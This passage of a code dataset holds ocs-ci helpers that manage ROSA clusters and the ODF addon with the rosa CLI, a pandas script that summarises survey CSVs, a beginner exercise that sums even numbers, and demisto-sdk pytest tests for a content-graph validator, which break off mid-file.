create_operator_roles(cluster):\n \"\"\"\n Create the cluster-specific Operator IAM roles. The roles created include the\n relevant prefix for the cluster name\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n cmd = f\"rosa create operator-roles --cluster {cluster}\" f\" --mode auto --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef create_oidc_provider(cluster):\n \"\"\"\n Create the OpenID Connect (OIDC) provider that the Operators will use to\n authenticate\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n cmd = f\"rosa create oidc-provider --cluster {cluster} --mode auto --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef download_rosa_cli():\n \"\"\"\n Method to download OCM cli\n\n Returns:\n str: path to the installer\n\n \"\"\"\n force_download = (\n config.RUN[\"cli_params\"].get(\"deploy\")\n and config.DEPLOYMENT[\"force_download_rosa_cli\"]\n )\n return utils.get_rosa_cli(\n config.ENV_DATA[\"rosa_cli_version\"], force_download=force_download\n )\n\n\ndef get_addon_info(cluster, addon_name):\n \"\"\"\n Get line related to addon from rosa `list addons` command.\n\n Args:\n cluster (str): cluster name\n addon_name (str): addon name\n\n Returns:\n str: line of the command for relevant addon. 
If not found, it returns None.\n\n \"\"\"\n cmd = f\"rosa list addons -c {cluster}\"\n output = utils.run_cmd(cmd)\n line = [line for line in output.splitlines() if re.match(f\"^{addon_name} \", line)]\n addon_info = line[0] if line else None\n return addon_info\n\n\ndef install_odf_addon(cluster):\n \"\"\"\n Install ODF Managed Service addon to cluster.\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n addon_name = config.ENV_DATA[\"addon_name\"]\n cluster_type = config.ENV_DATA.get(\"cluster_type\", \"\")\n provider_name = config.ENV_DATA.get(\"provider_name\", \"\")\n notification_email_0 = config.REPORTING.get(\"notification_email_0\")\n notification_email_1 = config.REPORTING.get(\"notification_email_1\")\n notification_email_2 = config.REPORTING.get(\"notification_email_2\")\n cmd = f\"rosa install addon --cluster={cluster} {addon_name} --yes\"\n if notification_email_0:\n cmd = cmd + f\" --notification-email-0 {notification_email_0}\"\n if notification_email_1:\n cmd = cmd + f\" --notification-email-1 {notification_email_1}\"\n if notification_email_2:\n cmd = cmd + f\" --notification-email-2 {notification_email_2}\"\n\n if cluster_type.lower() == \"provider\":\n size = config.ENV_DATA.get(\"size\", \"\")\n cmd += f\" --size {size}\"\n public_key = config.AUTH.get(\"managed_service\", {}).get(\"public_key\", \"\")\n if not public_key:\n raise ConfigurationError(\n \"Public key for Managed Service not defined.\\n\"\n \"Expected following configuration in auth.yaml file:\\n\"\n \"managed_service:\\n\"\n ' private_key: \"...\"\\n'\n ' public_key: \"...\"'\n )\n public_key_only = remove_header_footer_from_key(public_key)\n cmd += f' --onboarding-validation-key \"{public_key_only}\"'\n\n if cluster_type.lower() == \"consumer\" and provider_name:\n storage_provider_endpoint = get_storage_provider_endpoint(provider_name)\n cmd += f' --storage-provider-endpoint \"{storage_provider_endpoint}\"'\n onboarding_ticket = config.DEPLOYMENT.get(\"onboarding_ticket\", \"\")\n if not onboarding_ticket:\n onboarding_ticket = generate_onboarding_token()\n if onboarding_ticket:\n cmd += f' --onboarding-ticket \"{onboarding_ticket}\"'\n else:\n raise ValueError(\" Invalid onboarding ticket configuration\")\n\n utils.run_cmd(cmd, timeout=1200)\n for addon_info in utils.TimeoutSampler(\n 7200, 30, get_addon_info, cluster, addon_name\n ):\n logger.info(f\"Current addon installation info: {addon_info}\")\n if \"ready\" in addon_info:\n logger.info(f\"Addon {addon_name} was installed\")\n break\n if \"failed\" in addon_info:\n raise ManagedServiceAddonDeploymentError(\n f\"Addon {addon_name} failed to be installed\"\n )\n\n\ndef delete_odf_addon(cluster):\n \"\"\"\n Delete ODF Managed Service addon from cluster.\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n addon_name = config.ENV_DATA[\"addon_name\"]\n cmd = f\"rosa uninstall addon --cluster={cluster} {addon_name} --yes\"\n utils.run_cmd(cmd)\n for addon_info in utils.TimeoutSampler(\n 4000, 30, get_addon_info, cluster, addon_name\n ):\n logger.info(f\"Current addon installation info: \" f\"{addon_info}\")\n if \"not installed\" in addon_info:\n logger.info(f\"Addon {addon_name} was uninstalled\")\n break\n if \"failed\" in addon_info:\n raise ManagedServiceAddonDeploymentError(\n f\"Addon {addon_name} failed to be uninstalled\"\n )\n\n\ndef delete_operator_roles(cluster_id):\n \"\"\"\n Delete operator roles of the given cluster\n\n Args:\n cluster_id (str): the id of the cluster\n \"\"\"\n cmd = f\"rosa delete 
operator-roles -c {cluster_id} --mode auto --yes\"\n    utils.run_cmd(cmd, timeout=1200)\n\n\ndef delete_oidc_provider(cluster_id):\n    \"\"\"\n    Delete oidc provider of the given cluster\n\n    Args:\n        cluster_id (str): the id of the cluster\n    \"\"\"\n    cmd = f\"rosa delete oidc-provider -c {cluster_id} --mode auto --yes\"\n    utils.run_cmd(cmd, timeout=1200)\n\n\ndef is_odf_addon_installed(cluster_name=None):\n    \"\"\"\n    Check if the odf addon is installed\n\n    Args:\n        cluster_name (str): The cluster name. The default value is 'config.ENV_DATA[\"cluster_name\"]'\n\n    Returns:\n        bool: True, if the odf addon is installed. False, otherwise\n\n    \"\"\"\n    cluster_name = cluster_name or config.ENV_DATA[\"cluster_name\"]\n    addon_name = config.ENV_DATA.get(\"addon_name\")\n    addon_info = get_addon_info(cluster_name, addon_name)\n\n    if addon_info and \"ready\" in addon_info:\n        return True\n    else:\n        return False\n","repo_name":"musoni123/ocs-ci","sub_path":"ocs_ci/utility/rosa.py","file_name":"rosa.py","file_ext":"py","file_size_in_byte":16688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"29754217804","text":"import pandas as pd\n\n\ndf1 = pd.read_csv('dataWrangling/c1typResults.csv')\ndf2 = pd.read_csv('dataWrangling/c2typResults.csv')\ndf3 = pd.read_csv('dataWrangling/c3typResults.csv')\n\n\nsubc1 = [\n    11214, \n    #11263\n]\nsubc2 = [\n    #11189,\n    #11211,\n    11268,\n    11272,\n    11278,\n    11284\n]\nsubc3 = [\n    11221,\n    11240,\n    11293,\n    11318,\n    11308\n    ]\n\nmeans_df1 = df1.groupby(['id','category'], as_index= True)['response'].describe()\nmeans_df1.to_csv( \"C:/Users/apers/partXpush_data/typicality/persubj_encourageTyps_percat.csv\", index=True, encoding='utf-8-sig')\n\n\nmeans_df2 = df2.groupby(['id','category'], as_index= True)['response'].describe()\nmeans_df2.to_csv( \"C:/Users/apers/partXpush_data/typicality/persubj_discourageTyps_percat.csv\", index=True, encoding='utf-8-sig')\n\n\nmeans_df3 = df3.groupby(['id','category'], as_index= True)['response'].describe()\nmeans_df3.to_csv( \"C:/Users/apers/partXpush_data/typicality/persubj_neutralTyps_percat.csv\", index=True, encoding='utf-8-sig')\n\n\n","repo_name":"Josh-Glass/partXpush_data","sub_path":"typicality/getExtenderTyps.py","file_name":"getExtenderTyps.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21435271669","text":"'''\nWrite a program that reads SIX INTEGERS and shows the sum of only those that\nwere EVEN. 
If the value entered is odd, disregard it.\n'''\nsoma = 0\ncont = 0\nfor n in range(1, 7):\n    n = int(input('Enter number {}: '.format(n)))\n    if n % 2 == 0:\n        soma += n\n        cont += 1\nprint(f'The count of EVEN numbers is {cont} and their sum is {soma}')\n\n\n","repo_name":"gmary23/python_guanabara","sub_path":"mundo2/desafio050.py","file_name":"desafio050.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21452307441","text":"import logging\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, List, Optional\n\nimport pytest\n\nimport demisto_sdk.commands.content_graph.neo4j_service as neo4j_service\nfrom demisto_sdk.commands.common.constants import (\n    GENERAL_DEFAULT_FROMVERSION,\n    SKIP_PREPARE_SCRIPT_NAME,\n    MarketplaceVersions,\n)\nfrom demisto_sdk.commands.common.git_util import GitUtil\nfrom demisto_sdk.commands.common.hook_validations.graph_validator import GraphValidator\nfrom demisto_sdk.commands.common.legacy_git_tools import git_path\nfrom demisto_sdk.commands.content_graph.commands.create import (\n    create_content_graph,\n)\nfrom demisto_sdk.commands.content_graph.common import ContentType, RelationshipType\nfrom demisto_sdk.commands.content_graph.interface import (\n    ContentGraphInterface,\n)\nfrom demisto_sdk.commands.content_graph.objects.classifier import Classifier\nfrom demisto_sdk.commands.content_graph.objects.integration import Command, Integration\nfrom demisto_sdk.commands.content_graph.objects.pack import Pack\nfrom demisto_sdk.commands.content_graph.objects.playbook import Playbook\nfrom demisto_sdk.commands.content_graph.objects.repository import ContentDTO\nfrom demisto_sdk.commands.content_graph.objects.script import Script\nfrom demisto_sdk.commands.content_graph.tests.create_content_graph_test import (\n    mock_relationship,\n    mock_test_playbook,\n)\nfrom TestSuite.test_tools import str_in_call_args_list\n\nGIT_PATH = Path(git_path())\n\n\n# FIXTURES\n\n\n@pytest.fixture(autouse=True)\ndef setup_method(mocker):\n    \"\"\"Auto-used fixture for setup before every test run\"\"\"\n    import demisto_sdk.commands.content_graph.objects.base_content as bc\n\n    bc.CONTENT_PATH = GIT_PATH\n    mocker.patch.object(neo4j_service, \"REPO_PATH\", GIT_PATH)\n    mocker.patch.object(ContentGraphInterface, \"repo_path\", GIT_PATH)\n    mocker.patch(\n        \"demisto_sdk.commands.common.docker_images_metadata.get_remote_file_from_api\",\n        return_value={\n            \"docker_images\": {\n                \"python3\": {\n                    \"3.10.11.54799\": {\"python_version\": \"3.10.11\"},\n                    \"3.10.12.63474\": {\"python_version\": \"3.10.11\"},\n                }\n            }\n        },\n    )\n\n\n@pytest.fixture\ndef repository(mocker) -> ContentDTO:\n    repository = ContentDTO(\n        path=GIT_PATH,\n        packs=[],\n    )\n    relationships = {\n        RelationshipType.IN_PACK: [\n            mock_relationship(\n                \"SampleIntegration\",\n                ContentType.INTEGRATION,\n                \"SamplePack\",\n                ContentType.PACK,\n                source_marketplaces=[\n                    MarketplaceVersions.XSOAR,\n                    MarketplaceVersions.MarketplaceV2,\n                ],\n            ),\n            mock_relationship(\n                \"SampleScript\",\n                ContentType.SCRIPT,\n                \"SamplePack\",\n                ContentType.PACK,\n                source_marketplaces=[\n                    MarketplaceVersions.XSOAR,\n                    MarketplaceVersions.MarketplaceV2,\n                ],\n            ),\n        ],\n        RelationshipType.HAS_COMMAND: [\n            mock_relationship(\n                \"SampleIntegration\",\n                ContentType.INTEGRATION,\n                \"test-command\",\n                ContentType.COMMAND,\n                source_marketplaces=[\n                    MarketplaceVersions.XSOAR,\n                    MarketplaceVersions.MarketplaceV2,\n                ],\n                name=\"test-command\",\n                
description=\"\",\n deprecated=False,\n ),\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"deprecated-command\",\n ContentType.COMMAND,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n name=\"deprecated-command\",\n description=\"\",\n deprecated=True,\n ),\n ],\n RelationshipType.IMPORTS: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"TestApiModule\",\n ContentType.SCRIPT,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n )\n ],\n RelationshipType.TESTED_BY: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SampleTestPlaybook\",\n ContentType.TEST_PLAYBOOK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n )\n ],\n RelationshipType.USES_BY_ID: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SampleClassifier\",\n ContentType.CLASSIFIER,\n mandatorily=True,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SampleClassifier2\",\n ContentType.CLASSIFIER,\n mandatorily=True,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n ],\n RelationshipType.DEPENDS_ON: [\n mock_relationship(\n \"SamplePack\",\n ContentType.PACK,\n \"SamplePack2\",\n ContentType.PACK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n ],\n RelationshipType.USES: [\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"DeprecatedIntegration\",\n ContentType.INTEGRATION,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"deprecated-command\",\n ContentType.COMMAND,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n ],\n }\n relationship_pack2 = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SampleClassifier\",\n ContentType.CLASSIFIER,\n \"SamplePack2\",\n ContentType.PACK,\n ),\n mock_relationship(\n \"SampleTestPlaybook\",\n ContentType.TEST_PLAYBOOK,\n \"SamplePack2\",\n ContentType.PACK,\n ),\n mock_relationship(\n \"TestApiModule\",\n ContentType.SCRIPT,\n \"SamplePack2\",\n ContentType.PACK,\n source_marketplaces=[MarketplaceVersions.XSOAR],\n ),\n mock_relationship(\n \"SampleClassifier2\",\n ContentType.CLASSIFIER,\n \"SamplePack2\",\n ContentType.PACK,\n ),\n ],\n RelationshipType.USES_BY_ID: [\n mock_relationship(\n \"TestApiModule\",\n ContentType.SCRIPT,\n \"SampleScript2\",\n ContentType.SCRIPT,\n mandatorily=True,\n source_marketplaces=[MarketplaceVersions.XSOAR],\n ),\n ],\n }\n relationship_pack3 = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"SamplePack3\",\n ContentType.PACK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n mock_relationship(\n \"SamplePlaybook2\",\n ContentType.PLAYBOOK,\n \"SamplePack3\",\n ContentType.PACK,\n source_fromversion=GENERAL_DEFAULT_FROMVERSION,\n ),\n mock_relationship(\n \"SampleScript2\",\n ContentType.SCRIPT,\n \"SamplePack3\",\n ContentType.PACK,\n ),\n ],\n RelationshipType.USES_BY_ID: [\n mock_relationship(\n 
\"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"SamplePlaybook2\",\n ContentType.PLAYBOOK,\n mandatorily=True,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n ],\n }\n relationship_pack4 = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SamplePlaybook\", ContentType.PLAYBOOK, \"SamplePack4\", ContentType.PACK\n )\n ]\n }\n pack1 = mock_pack(\n \"SamplePack\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n pack2 = mock_pack(\"SamplePack2\", [MarketplaceVersions.XSOAR], hidden=True)\n pack3 = mock_pack(\n \"SamplePack3\",\n [\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n MarketplaceVersions.XPANSE,\n ],\n )\n pack4 = mock_pack(\"SamplePack4\", list(MarketplaceVersions))\n pack1.relationships = relationships\n pack2.relationships = relationship_pack2\n pack3.relationships = relationship_pack3\n pack4.relationships = relationship_pack4\n pack1.content_items.integration.append(mock_integration())\n pack1.content_items.integration.append(\n mock_integration(name=\"DeprecatedIntegration\", deprecated=True)\n )\n pack1.content_items.script.append(\n mock_script(\n \"SampleScript\",\n [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n )\n )\n pack1.content_items.script.append(\n mock_script(\n \"setIncident\",\n [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n )\n )\n pack2.content_items.script.append(mock_script(\"TestApiModule\"))\n pack2.content_items.script.append(\n mock_script(\n \"getIncidents\",\n marketplaces=[MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n skip_prepare=[SKIP_PREPARE_SCRIPT_NAME],\n )\n )\n pack2.content_items.classifier.append(mock_classifier(\"SampleClassifier2\"))\n pack2.content_items.test_playbook.append(mock_test_playbook())\n pack3.content_items.playbook.append(\n mock_playbook(\n \"SamplePlaybook\",\n [MarketplaceVersions.XSOAR, MarketplaceVersions.XPANSE],\n \"6.5.0\",\n GENERAL_DEFAULT_FROMVERSION,\n )\n )\n pack3.content_items.playbook.append(\n mock_playbook(\n \"SamplePlaybook2\",\n [MarketplaceVersions.XSOAR],\n GENERAL_DEFAULT_FROMVERSION,\n \"6.5.0\",\n )\n )\n pack3.content_items.script.append(mock_script(\"SampleScript2\"))\n pack3.content_items.script.append(\n mock_script(\n \"setAlert\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n )\n pack3.content_items.script.append(\n mock_script(\n \"getAlert\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n )\n pack3.content_items.script.append(\n mock_script(\n \"getAlerts\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n )\n pack4.content_items.playbook.append(mock_playbook(\"SamplePlaybook\"))\n repository.packs.extend([pack1, pack2, pack3, pack4])\n mocker.patch(\n \"demisto_sdk.commands.content_graph.content_graph_builder.ContentGraphBuilder._create_content_dtos\",\n return_value=[repository],\n )\n return repository\n\n\n# HELPERS\n\n\ndef mock_dependency(source: str, target: str, mandatory: bool = True) -> Dict[str, Any]:\n return {\n \"source_id\": source,\n \"source_type\": ContentType.PACK,\n \"target\": target,\n \"target_type\": ContentType.PACK,\n \"mandatorily\": mandatory,\n }\n\n\ndef update_repository(\n repository: ContentDTO,\n commit_func: Callable[[ContentDTO], List[Pack]],\n) -> List[str]:\n updated_packs = commit_func(repository)\n pack_ids_to_update = [pack.object_id for pack in updated_packs]\n repository.packs = [\n pack for pack in 
repository.packs if pack.object_id not in pack_ids_to_update\n ]\n repository.packs.extend(updated_packs)\n return pack_ids_to_update\n\n\ndef _get_pack_by_id(repository: ContentDTO, pack_id: str) -> Pack:\n for pack in repository.packs:\n if pack.object_id == pack_id:\n return pack\n raise ValueError(f\"Pack {pack_id} does not exist in the repository.\")\n\n\ndef mock_pack(name, marketplaces, hidden=False):\n return Pack(\n object_id=name,\n content_type=ContentType.PACK,\n node_id=f\"{ContentType.PACK}:{name}\",\n path=Path(\"Packs\"),\n name=\"pack_name\",\n marketplaces=marketplaces,\n hidden=hidden,\n server_min_version=\"5.5.0\",\n current_version=\"1.0.0\",\n tags=[],\n categories=[],\n useCases=[],\n keywords=[],\n contentItems=[],\n excluded_dependencies=[],\n deprecated=False,\n )\n\n\ndef mock_playbook(\n name,\n marketplaces=[MarketplaceVersions.XSOAR],\n fromversion=\"5.0.0\",\n toversion=\"99.99.99\",\n):\n return Playbook(\n id=name,\n content_type=ContentType.PLAYBOOK,\n node_id=f\"{ContentType.PLAYBOOK}:{name}\",\n path=Path(name),\n fromversion=fromversion,\n toversion=toversion,\n display_name=name,\n name=name,\n marketplaces=marketplaces,\n deprecated=False,\n is_test=False,\n )\n\n\ndef mock_script(name, marketplaces=[MarketplaceVersions.XSOAR], skip_prepare=[]):\n return Script(\n id=name,\n content_type=ContentType.SCRIPT,\n node_id=f\"{ContentType.SCRIPT}:{name}\",\n path=Path(\"Packs\"),\n fromversion=\"5.0.0\",\n display_name=name,\n toversion=\"6.0.0\",\n name=name,\n marketplaces=marketplaces,\n deprecated=False,\n type=\"python3\",\n docker_image=\"demisto/python3:3.10.11.54799\",\n tags=[],\n is_test=False,\n skip_prepare=skip_prepare,\n )\n\n\ndef mock_integration(name: str = \"SampleIntegration\", deprecated: bool = False):\n return Integration(\n id=name,\n content_type=ContentType.INTEGRATION,\n node_id=f\"{ContentType.INTEGRATION}:{name}\",\n path=Path(name),\n fromversion=\"5.0.0\",\n toversion=\"99.99.99\",\n display_name=name,\n name=name,\n marketplaces=[MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n deprecated=deprecated,\n type=\"python3\",\n docker_image=\"demisto/python3:3.10.11.54799\",\n category=\"blabla\",\n commands=[\n Command(name=\"test-command\", description=\"\"),\n Command(name=\"deprecated-command\", description=\"\"),\n ],\n )\n\n\ndef mock_classifier(name: str = \"SampleClassifier\"):\n return Classifier(\n id=name,\n content_type=ContentType.CLASSIFIER,\n node_id=f\"{ContentType.CLASSIFIER}:{name}\",\n path=Path(\"Packs\"),\n fromversion=\"5.0.0\",\n display_name=name,\n toversion=\"99.99.99\",\n name=name,\n marketplaces=[MarketplaceVersions.XSOAR],\n deprecated=False,\n type=\"python3\",\n docker_image=\"mock:docker\",\n tags=[],\n is_test=False,\n )\n\n\n# TESTS\n\n\ndef test_are_toversion_relationships_paths_valid(repository: ContentDTO):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"are_toversion_relationships_paths_valid\"\n Then\n - Validate the existence of invalid to_version relationships\n \"\"\"\n\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_toversion_fields()\n\n assert not is_valid\n\n\ndef test_are_fromversion_relationships_paths_valid(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"are_fromversion_relationships_paths_valid\"\n Then\n - Validate the existence of invalid from_version relationships\n \"\"\"\n logger_error 
= mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_fromversion_fields()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"Content item 'SamplePlaybook' whose from_version is '6.5.0' uses the content\"\n \" items: 'SamplePlaybook2' whose from_version is higher\",\n )\n\n\n@pytest.mark.parametrize(\n \"include_optional, is_valid\",\n [\n pytest.param(\n False,\n True,\n id=\"Not providing git_files - should be valid (raised a warning)\",\n ),\n pytest.param(\n True,\n False,\n id=\"providing git_files - should be invalid\",\n ),\n ],\n)\ndef test_is_file_using_unknown_content(\n mocker,\n repository: ContentDTO,\n include_optional: bool,\n is_valid: bool,\n):\n \"\"\"\n Given\n - A content repo\n - An integration SampleIntegration's default classifier is set to \"SampleClassifier\" which does not exist\n When\n - running the validation \"is_file_using_unknown_content\"\n Then\n - Check whether the graph is valid or not, based on whether optional content dependencies were included.\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n logger_warning = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"warning\")\n with GraphValidator(\n update_graph=False, git_files=[], include_optional_deps=include_optional\n ) as graph_validator:\n create_content_graph(graph_validator.graph)\n assert graph_validator.is_file_using_unknown_content() == is_valid\n\n logger_to_search = logger_warning if is_valid else logger_error\n\n assert str_in_call_args_list(\n logger_to_search.call_args_list,\n \"Content item 'SampleIntegration' using content items: SampleClassifier which\"\n \" cannot be found in the repository\",\n )\n\n\ndef test_is_file_display_name_already_exists(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"is_file_display_name_already_exists\"\n Then\n - Validate the existence of duplicate display names\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.is_file_display_name_already_exists()\n\n assert not is_valid\n for i in range(1, 4):\n assert str_in_call_args_list(\n logger_error.call_args_list,\n f\"Pack 'SamplePack{i if i != 1 else ''}' has a duplicate display_name\",\n )\n\n\ndef test_validate_unique_script_name(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"validate_unique_script_name\"\n Then\n - Validate the existence of duplicate script names\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_unique_script_name()\n\n assert not is_valid\n\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"Cannot create a script with the name setAlert, \"\n \"because a script with the name setIncident already exists.\\n\",\n )\n\n assert not str_in_call_args_list(\n logger_error.call_args_list,\n \"Cannot create a script with the name getAlert, \"\n \"because a script with the name getIncident already exists.\\n\",\n )\n\n # Ensure that the script-name-incident-to-alert 
ignore is working\n assert not str_in_call_args_list(\n logger_error.call_args_list,\n \"Cannot create a script with the name getAlerts, \"\n \"because a script with the name getIncidents already exists.\\n\",\n )\n\n\ndef test_are_marketplaces_relationships_paths_valid(\n repository: ContentDTO, caplog, mocker\n):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"validate_marketplaces_fields\"\n Then\n - Validate the existence of invalid marketplaces uses\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_marketplaces_fields()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"Content item 'SamplePlaybook' can be used in the 'xsoar, xpanse' marketplaces\"\n \", however it uses content items: 'SamplePlaybook2' which are not supported in\"\n \" all of the marketplaces of 'SamplePlaybook'\",\n )\n\n\ndef test_validate_dependencies(repository: ContentDTO, caplog, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"validate_dependencies\"\n Then\n - Validate the existence of an invalid core pack dependency\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n mocker.patch(\n \"demisto_sdk.commands.common.hook_validations.graph_validator.get_marketplace_to_core_packs\",\n return_value={MarketplaceVersions.XSOAR: {\"SamplePack\"}},\n )\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_dependencies()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"The core pack SamplePack cannot depend on non-core packs: \",\n )\n\n\ndef test_validate_duplicate_id(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo with duplicate ids \"SamplePlaybook\" (configured on repository fixture)\n When\n - running the validation \"validate_duplicate_id\"\n Then\n - Validate the existence of duplicate ids\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_duplicate_ids()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"[GR105] - The ID 'SamplePlaybook' already exists in\",\n )\n\n\ndef test_pack_ids_collection():\n git_files = [\n \"Tests/conf.json\",\n \"Packs/MicrosoftExchangeOnline/Integrations/EwsExtension/README.md\",\n ]\n expected_pack_ids = [\"MicrosoftExchangeOnline\"]\n with GraphValidator(update_graph=False, git_files=git_files) as graph_validator:\n assert graph_validator.pack_ids == expected_pack_ids\n\n\ndef test_deprecated_usage__existing_content(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo with an item using deprecated commands in existing content.\n When\n - running the validation validate_deprecated_items_usage\n Then\n - validate a warning is displayed but it is still considered valid\n \"\"\"\n\n logger_info = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"warning\")\n with GraphValidator(update_graph=False) as validator:\n create_content_graph(validator.graph)\n is_valid = validator.validate_deprecated_items_usage()\n\n assert is_valid\n assert str_in_call_args_list(\n 
logger_info.call_args_list,\n \"[GR107] - The Command 'deprecated-command' is deprecated but used in the following content item:\",\n )\n assert str_in_call_args_list(\n logger_info.call_args_list,\n \"[GR107] - The Integration 'DeprecatedIntegration' is deprecated but used in the following content item:\",\n )\n\n\ndef test_deprecated_usage__new_content(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo with the new item \"SamplePlaybook\" using a deprecated command.\n When\n - running the validation validate_deprecated_items_usage\n Then\n - validate the files considered as invalid.\n \"\"\"\n mocker.patch.object(GitUtil, \"added_files\", return_value=[Path(\"SamplePlaybook\")])\n with GraphValidator(update_graph=False) as validator:\n create_content_graph(validator.graph)\n is_valid = validator.validate_deprecated_items_usage()\n\n assert not is_valid\n\n\n@pytest.mark.parametrize(\n \"changed_pack\", [\"Packs/SamplePack\", \"Packs/SamplePack2\", None]\n)\ndef test_validate_hidden_pack_is_not_mandatory_dependency(\n repository: ContentDTO, mocker, changed_pack: Optional[str]\n):\n \"\"\"\n Given\n - A content repo which contains SamplePack that is dependent on\n SamplePack2 (which is hidden) as mandatory dependency\n\n When\n - Case A: the changed file was the hidden pack.\n - Case B: the changed file was the hidden pack's mandatory dependency\n - Case C: validate all triggered (no git files were sent)\n\n Then\n - validate that an error occurs with a message stating that SamplePack2 is hidden and has mandatory dependencies\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n\n git_files = [Path(changed_pack)] if changed_pack else changed_pack\n\n with GraphValidator(update_graph=False, git_files=git_files) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = (\n graph_validator.validate_hidden_packs_do_not_have_mandatory_dependencies()\n )\n\n assert not is_valid\n assert str_in_call_args_list(\n 